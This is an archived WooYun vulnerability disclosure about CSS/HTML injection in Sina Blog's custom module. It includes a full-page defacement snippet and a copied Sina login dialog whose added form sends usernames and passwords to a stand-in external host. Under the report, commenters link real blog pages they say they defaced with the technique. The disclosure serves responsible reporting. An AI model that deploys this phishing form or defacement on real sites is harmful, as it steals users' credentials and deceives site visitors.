当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035816

漏洞标题:我是如何黑掉新浪博客的(可钓鱼)

相关厂商:新浪

漏洞作者: LaiX

提交时间:2013-09-01 10:09

修复时间:2013-10-16 10:10

公开时间:2013-10-16 10:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-01: 细节已通知厂商并且等待厂商处理中
2013-09-01: 厂商已经确认,细节仅向厂商公开
2013-09-11: 细节向核心白帽子及相关领域专家公开
2013-09-21: 细节向普通白帽子公开
2013-10-01: 细节向实习白帽子公开
2013-10-16: 细节向公众公开

简要描述:

详细说明:

不知道算不算发现了一个革命性的漏洞
先来看看这个页面

http://blog.sina.com.cn/u/3636469737


1.jpg


漏洞证明:

我承认我标题党了.....- -
我暂且把这个漏洞叫做 CSS样式劫持。
其实这个"黑掉"只是一个恶作剧而已。
先来看看这个"黑页"是怎么实现的
先来到自定义模块

2.png


又是这个自定义模块惹得祸啊
这个地方可以自定义CSS样式,所以就出了大事。

<table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><h1>Hello Sina</h1></td></tr></tbody></table>


我们在这里插入上面的代码,然后保存,刷新然后整个页面就被劫持,就出现了上面黑页的效果。
那么仅仅只是挂个黑页恶作剧,好玩?
我们来看看另外一种玩法
为什么叫CSS劫持,因为它还可以冒充已经定义好的DIV窗口

3.png


这不是登录窗口吗。
我们拿到这个窗口的HTML代码

<table id="_2381377975243257_panel" class="CP_w" style="left: 480px; top: 205px; z-index: 5000; position: absolute; opacity: 1;"><thead id="_2381377975243257_titleBar" style="cursor: move;"><tr><th class="tLeft"><span></span></th><th class="tMid"><div class="bLyTop"><strong id="_2381377975243257_titleName">登录新浪博客</strong><cite><a id="_2381377975243257_btnClose" href="#" onclick="return false;" class="CP_w_shut" title="关闭">关闭</a></cite></div></th><th class="tRight"><span></span></th></tr></thead><tfoot><tr><td class="tLeft"><span></span></td><td class="tMid"><span></span></td><td class="tRight"><span></span></td></tr></tfoot><tbody><tr><td class="tLeft"><span></span></td><td class="tMid" id="_2381377975243257_content">		<div class="CP_layercon2 passLoginItem">			<div>				<div id="login_move_tip" style="display:none;margin-bottom:12px">可以使用新浪微博、邮箱、通行证的帐号进行登录</div>				<div class="boxA">登录名:					<input tabindex="201" type="text" class="fm1" style="width:215px;" name="login_name" id="login_name_d">  <a style="font-size: 12px;" href="http://login.sina.com.cn/signup/signupmail.php?entry=blog&amp;srcuid=3541956257&amp;src=blogicp" target="_blank">立即注册</a>				</div>				<div class="boxA">密 码:					<input tabindex="202" type="password" class="fm1" style="width:215px;" name="login_pass" maxlength="16" id="login_pass_d">  <a style="font-size: 12px;" href="http://login.sina.com.cn/getpass.html" target="_blank">找回密码</a>				</div>				<div id="login_ckimg" class="boxA" style="display:none"> <p class="p_img">验证码:                  	<input type="text" id="login_vcode" name="login_vcode" class="fm1" size="10" maxlength="5">                  	<img width="100" align="absmiddle" id="checkImg" src="http://login.sina.com.cn/cgi/pin.php?r=40411377975241946&amp;s=0"> <a href="javascript:;" onclick="return false;" style="font-size: 12px;"><span id="reloadCode">换一换</span></a></p> 			    </div>				<div class="ErrTips" id="login_div_error"></div>				<div class="boxB"><p><input tabindex="203" type="checkbox" value="" id="login_save" checked="checked"><label for="login_save"> 记住登录状态</label></p><p id="login_save_tips" style="color:#999;display:none;">建议在网吧/公用电脑上取消该选项</p><p style="margin-top: 8px;"><a id="login_button" class="SG_aBtn SG_aBtnB SG_aBtn_sub" href="javascript:;" tabindex="204"><cite>登录<input type="text"></cite></a> </p></div>			</div>			<div class="connect_msn" id="connect_msn" style="position:relative;">				<span>使用 MSN 帐号登录博客</span>				<a href="#" onclick="Lib.checkAuthor();v7sendLog('48_01_36'); window.open('https://login.live.com/oauth20_authorize.srf?client_id=0000000040046F08&amp;redirect_uri=http%3A%2F%2Fcontrol.blog.sina.com.cn%2Fblog_rebuild%2Fmsn%2FmsnLoginCallBack.php&amp;response_type=code&amp;scope=wl.basic%20wl.signin%20wl.offline_access%20wl.share%20wl.emails','neww','left=500,top=250,height=400,width=440');msnrefreshWindow();" style="background:transparent url(http://simg.sinajs.cn/blog7style/images/msn_login01.gif) no-repeat left top; width:70px; height:22px; line-height:22px; display:inline-block; text-align:left; text-indent:2em; text-decoration:none; color:white; font-weight:bold; font-size:14px;">登录</a>			</div>			<a href="http://blog.sina.com.cn/s/blog_4b0f52990100miil.html" target="_blank" style="left:308px;position:relative;top:-24px;">如何登录?</a>			<div class="CP_lg_ad SG_j_linedot1">				<iframe id="login_ad" src="http://blog.sina.com.cn/lm/iframe/71/2008/0731/21.html" frameborder="0" scrolling="no" height="25" width="auto"></iframe>			</div>		</div></td><td class="tRight"><span></span></td></tr></tbody></table>


弄到刚刚的自定义模块中看看。

4.png


一个钓鱼窗口就完整的出现在了我们的面前,不过它还不能工作。
我们需要修改一下代码
这里新浪并没有屏蔽掉<from>标签。
所以我们只需要在源码里加上from就可以实现钓鱼效果。

<table id="_9971377970387149_panel" class="CP_w" style="left: 480px; top: 205px; z-index: 5000; position: absolute; opacity: 1;">
<thead id="_9971377970387149_titleBar" style="cursor: move;"><tr><th class="tLeft"><span></span></th><th class="tMid">
<div class="bLyTop">
<strong id="_9971377970387149_titleName">登录新浪博客</strong><cite>
<a id="_9971377970387149_btnClose" href="#" onclick="return false;" class="CP_w_shut" title="关闭">关闭</a></cite></div></th><th class="tRight"><span></span></th></tr></thead><tfoot><tr><td class="tLeft"><span></span></td><td class="tMid"><span></span></td><td class="tRight"><span></span></td></tr></tfoot><tbody><tr><td class="tLeft"><span></span></td><td class="tMid" id="_9971377970387149_content">		<div class="CP_layercon2 passLoginItem">			<div>				
<form name="input" action="http://www.x.com/ok.php" method="get">
<div id="login_move_tip" style="display:none;margin-bottom:12px">可以使用新浪微博、邮箱、通行证的帐号进行登录</div>				<div class="boxA">登录名:					<input tabindex="201" type="text" class="fm1" style="width:215px;" name="login_name" id="login_name_d">  <a style="font-size: 12px;" href="http://login.sina.com.cn/signup/signupmail.php?entry=blog&amp;srcuid=3636469737&amp;src=blogicp" target="_blank">立即注册</a>				</div>				<div class="boxA">密 码:					<input tabindex="202" type="password" class="fm1" style="width:215px;" name="login_pass" maxlength="16" id="login_pass_d">  <a style="font-size: 12px;" href="http://login.sina.com.cn/getpass.html" target="_blank">找回密码</a>				</div>				<div id="login_ckimg" class="boxA" style="display:none"> <p class="p_img">验证码:                  	<input type="text" id="login_vcode" name="login_vcode" class="fm1" size="10" maxlength="5">                  	<img width="100" align="absmiddle" id="checkImg" src="http://login.sina.com.cn/cgi/pin.php?r=62971377970385056&amp;s=0"> <a href="javascript:;" onclick="return false;" style="font-size: 12px;"><span id="reloadCode">换一换</span></a></p> 			    </div>				<div class="ErrTips" id="login_div_error"></div>				<div class="boxB"><p><input tabindex="203" type="checkbox" value="" id="login_save" checked="checked"><label for="login_save"> 记住登录状态</label></p><p id="login_save_tips" style="color:#999;display:none;">建议在网吧/公用电脑上取消该选项</p><p style="margin-top: 8px;"><input type="submit" value="登录"> </p></div>			</div>			<div class="connect_msn" id="connect_msn" style="position:relative;">				<span>使用 MSN 帐号登录博客</span>				<a href="#" onclick="Lib.checkAuthor();v7sendLog('48_01_36'); window.open('https://login.live.com/oauth20_authorize.srf?client_id=0000000040046F08&amp;redirect_uri=http%3A%2F%2Fcontrol.blog.sina.com.cn%2Fblog_rebuild%2Fmsn%2FmsnLoginCallBack.php&amp;response_type=code&amp;scope=wl.basic%20wl.signin%20wl.offline_access%20wl.share%20wl.emails','neww','left=500,top=250,height=400,width=440');msnrefreshWindow();" style="background:transparent url(http://simg.sinajs.cn/blog7style/images/msn_login01.gif) no-repeat left top; width:70px; height:22px; line-height:22px; display:inline-block; text-align:left; text-indent:2em; text-decoration:none; color:white; font-weight:bold; font-size:14px;">登录</a>			</div>	
</form>		<a href="http://blog.sina.com.cn/s/blog_4b0f52990100miil.html" target="_blank" style="left:308px;position:relative;top:-24px;">如何登录?</a>			<div class="CP_lg_ad SG_j_linedot1">				<iframe id="login_ad" src="http://blog.sina.com.cn/lm/iframe/71/2008/0731/21.html" frameborder="0" scrolling="no" height="25" width="auto"></iframe>			</div>		</div></td><td class="tRight"><span></span></td></tr></tbody></table>


5.png


修复方案:

禁用一些css的样式

版权声明:转载请注明来源 LaiX@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-09-01 19:59

厂商回复:

感谢关注新浪安全,思路挺不错,

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-01 10:21 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    我信洞主

  2. 2013-09-01 10:26 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    +1

  3. 2013-09-01 10:36 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @niliu 我不信。

  4. 2013-09-01 11:03 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    不信+1

  5. 2013-09-01 11:09 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

    真的好黑啊

  6. 2013-09-01 11:17 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    我信洞主!

  7. 2013-09-01 11:36 | rootnmxx ( 路人 | Rank:5 漏洞数:1 )

    我不信洞主+1

  8. 2013-09-01 11:37 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    猜我信不信 。。 快猜。。

  9. 2013-09-01 12:21 | 艾特绅 ( 路人 | Rank:21 漏洞数:5 | 愿意为网络安全做出我的贡献)

    马克

  10. 2013-09-01 12:31 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    信or不信

  11. 2013-09-01 13:34 | ‫‌ ( 实习白帽子 | Rank:76 漏洞数:14 )

    <table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><h1>Hello Sina</h1></td></tr></tbody></table>哦。。呵呵。。。

  12. 2013-09-01 13:34 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    好黑啊...

  13. 2013-09-01 14:01 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    我是如何黑掉新浪博客的(可吃鱼)

  14. 2013-09-01 14:12 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    我是如何黑掉QQ空间的

  15. 2013-09-01 14:12 | 艾特绅 ( 路人 | Rank:21 漏洞数:5 | 愿意为网络安全做出我的贡献)

    @M4sk 你懂不?

  16. 2013-09-01 14:19 | LauRen ( 路人 | Rank:4 漏洞数:1 | 苦逼屌丝一枚。)

    mark

  17. 2013-09-01 14:26 | 艾特绅 ( 路人 | Rank:21 漏洞数:5 | 愿意为网络安全做出我的贡献)

    出现在 自定义组件的地方?

  18. 2013-09-01 14:35 | tzrj ( 实习白帽子 | Rank:87 漏洞数:24 | 1111)

    mark

  19. 2013-09-01 14:35 | tzrj ( 实习白帽子 | Rank:87 漏洞数:24 | 1111)

    mark

  20. 2013-09-01 14:42 | 艾特绅 ( 路人 | Rank:21 漏洞数:5 | 愿意为网络安全做出我的贡献)

    http://blog.sina.com.cn/u/3537027933 成功了

  21. 2013-09-01 14:44 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @艾特绅 高端~求透露一下

  22. 2013-09-01 15:11 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    http://blog.sina.com.cn/u/1665982522改不回去了 艹

  23. 2013-09-01 15:22 | 艾特绅 ( 路人 | Rank:21 漏洞数:5 | 愿意为网络安全做出我的贡献)

    @北洋贱队 可以改

  24. 2013-09-01 16:11 | Lenwood ( 路人 | Rank:0 漏洞数:1 | test)

    http://blog.sina.com.cn/u/1762948335

  25. 2013-09-01 17:54 | plane636 ( 普通白帽子 | Rank:160 漏洞数:16 )

    @冷静 添加自定义组件,加样式代码就行

  26. 2013-09-01 18:27 | 新浪(乌云厂商)

    这个简要描述,有点不合适吧

  27. 2013-09-01 18:49 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    @新浪 我刚刚到家,失误失误..马上修改

  28. 2013-09-01 19:06 | 小贱 ( 路人 | Rank:5 漏洞数:2 | 我是一只小菜鸟啊 飞呀飞呀飞)

    吊爆了。。。http://blog.sina.com.cn/u/2045174667

  29. 2013-09-01 19:16 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    各位有点白帽子精神别传播也别修改了, @xsser 来删了评论吧

  30. 2013-09-01 19:21 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @新浪 。。。原来你一直都在啊。、。

  31. 2013-09-01 20:24 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @plane636 谢谢了.我去测试QQ空间发现不行..

  32. 2013-09-01 21:25 | 小贱 ( 路人 | Rank:5 漏洞数:2 | 我是一只小菜鸟啊 飞呀飞呀飞)

    @冷静 和我一样。。。我连百度都试了 没用。。

  33. 2013-09-01 22:41 | Lenwood ( 路人 | Rank:0 漏洞数:1 | test)

    修复了,我擦。

  34. 2013-09-02 19:35 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    @Lenwood 修复了不会再绕吗。

  35. 2013-10-08 09:02 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    漏洞利用方式很赞

  36. 2013-10-16 11:52 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    5分 真心渣渣了

  37. 2013-10-16 13:53 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    @小威 是啊很渣的,没想到还能得5分

  38. 2013-10-16 14:43 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    @LaiX 我是说性浪渣渣了 ~ 非你